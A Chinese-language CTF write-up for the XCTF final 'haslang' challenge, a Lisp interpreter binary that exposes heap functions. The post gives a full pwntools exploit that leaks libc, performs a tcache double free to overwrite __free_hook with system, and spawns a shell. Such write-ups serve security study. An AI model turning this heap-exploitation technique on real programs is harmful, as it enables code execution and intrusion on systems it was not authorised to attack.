xctf-final第七届-haslang

Word count: 587   |   Reading time≈ 3 min

不是很有学习价值的题目

报错发现是lisp解释器,直接提取字符串去了,1k多个函数正常人都不会去逆向

1
strings -t x ./haslang | grep -E '[[:alnum:]]' >sym.txt

发现存在alloc,free,editChunk,showChunk可以使用,

alloc和free都是正常的lisp语法,就editChunk麻烦了点

1
2
3
4
#(define ptr1 (alloc 1168))
#(free ptr1)
#(showChunk ptr1)
#(editChunk ptr1 0 1)

ptr1只是变量名,可以创建不同变量名的堆块,alloc大小和edit的数据只能是十进制整型,所以exp还要数据处理,而且他的show只show可以见字符,不可见的直接忽略,libc泄露还要爆破。

editChunk的 0是下标,一个内存片段8个字节坐标就是0-7,第三个参数就是写入数据

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
from pwn import *
#strings -t x ./haslang | grep -E '[[:alnum:]]' >sym.txt 
# patchelf --set-interpreter ./glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/ld-2.27.so --set-rpath ./glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64 haslang 
elf=ELF('./haslang')
libc=elf.libc
#context.log_level = 'debug'
#(define ptr1 (alloc 1168))
#(free ptr1)
#(showChunk ptr1)
#(editChunk ptr1 0 1)
def add(who, size):
    r.sendlineafter('>>> ','(define ' + str(who) + ' (alloc ' + str(size) + '))')

def free(who):
    r.sendlineafter('>>> ','(free ' + str(who) + ')')

def edit(who, idx, what):
    r.sendlineafter('>>> ','(editChunk ' + str(who) + ' ' + str(idx) + ' ' + str(what) + ')')

def show(who):
    r.sendlineafter('>>> ','(showChunk ' + str(who) + ')')

#gdb.attach(r)

def exp(r):
	add('ptr0',0x20)
	add('ptr1', 0x500)
	add('ptr2', 0x20)
	add('ptr3', 0x20)
	edit('ptr3',0,0x73)#s
	edit('ptr3',1,0x68)#h
	free('ptr1')
	show('ptr1')
	leak=u64(r.recvuntil(b'\x7f',timeout=1).ljust(8,b'\x00'))*0x100+0xa0
	print(hex(leak))
	free('ptr0')
	edit('ptr0',8,0)
	edit('ptr0',9,0)
	edit('ptr0',10,0)
	free('ptr0')
	base=leak-0xdb4ca0
	print(hex(base))
	hook=base+0xdb68e8
	sys=base+0xa18420
	print(hex(hook))
	addr = int(hex(hook),16)


	# 将每个字节转为十进制
	dec_list = list((addr.to_bytes(8, 'little')))
	for i in range(len(dec_list)):
	    edit('ptr0', i, dec_list[i])
	show('ptr0')
	leak=u64(r.recvuntil(b'\x7f',timeout=1).ljust(8,b'\x00'))*0x10+0xa0
	add('ptr0',0x20)
	add('ptr0',0x20)


	addr = int(hex(sys),16)
	# 将每个字节转为十进制
	dec_list = list((addr.to_bytes(8, 'little')))
	for i in range(len(dec_list)):
	    edit('ptr0', i, dec_list[i])
	free('ptr3')#system('sh')
	r.interactive()
while True:
	try:
		r = process('./haslang')
		exp(r)
	except Exception as e:
		r.close()
  • Copyright: Copyright is owned by the author. For commercial reprints, please contact the author for authorization. For non-commercial reprints, please indicate the source.

扫一扫,分享到微信

微信分享二维码
  • Copyrights © 2021-2023 H.greed
  • Visitors: | Views:

请我喝杯咖啡吧~

支付宝
微信